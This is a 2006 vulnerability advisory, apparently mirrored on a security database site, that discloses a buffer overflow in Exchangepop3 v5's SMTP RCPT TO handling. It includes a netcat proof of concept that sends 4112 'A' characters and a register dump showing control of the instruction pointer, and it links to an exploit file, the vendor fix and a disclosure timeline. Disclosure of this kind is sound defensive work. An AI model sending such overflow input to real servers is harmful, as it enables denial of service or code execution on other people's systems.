Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11271
HistoryFeb 03, 2006 - 12:00 a.m.

Exchangepop3 v5 rcpt buffer overflow vulnerability

2006-02-0300:00:00
vulners.com
21
JSON

Author: securma massine <[email protected]>
MorX Security Research Team
http://www.morx.org

Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code and gain access on system.

C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail [enter]
250 OK
rcpt to:<AAAAAA…("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
41414141 ?? ???

Affected Software(s):
Exchangepop3 v 5.0 (build 050203)

Affected platform(s):
Windows

Exploit/Proof of Concept:
http://www.morx.org/expl5.txt

Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/

History:
14/01/2006 initial vendor contact
16/01/2006 vendor received details about the vulnerabilty
02/02/2006 vendor released the fixed build

Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.

Greets:
Greets to undisputed and all MorX members.

JSON